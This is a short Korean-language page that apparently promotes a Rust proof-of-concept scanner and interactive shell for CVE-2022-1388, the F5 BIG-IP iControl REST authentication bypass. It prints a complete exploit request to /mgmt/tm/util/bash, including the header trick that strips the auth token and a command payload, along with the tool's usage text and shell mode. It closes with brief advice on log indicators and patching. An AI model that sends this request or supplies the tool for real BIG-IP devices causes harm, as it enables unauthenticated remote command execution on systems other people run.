
Rust로 작성된 CVE-2022-1388 F5 BIG-IP iControl REST 인증 우회 RCE
Rust로 작성된 CVE-2022-1388 F5 BIG-IP iControl REST 인증 우회 RCE 스캐너 및 인터랙티브 셸
마무리로, 이 취약점을 악용하기 위한 요청의 필요 조건 개요는 다음과 같습니다:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
"command":"run",
"utilCmdArgs":"-c id"
}
$ cve_2022_1308_rs -h
CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust
USAGE:
cve_2022_1388_rs [OPTIONS] --url <URL>
OPTIONS:
-h, --help Print help information
-s, --shell This mode for accessing payload with interactive shell
-u, --url <URL> F5 Big-IP target url
-V, --version Print version information
IoC는 /var/log/audit 로그 파일에서 찾을 수 있습니다. mgmt/tm/util/bash 엔드포인트에서 실행된 인식할 수 없는 명령어는 우려의 원인이 되어야 합니다.
최신 버전으로 업데이트하거나 F5 보안 권고의 지침에 따라 완화하십시오.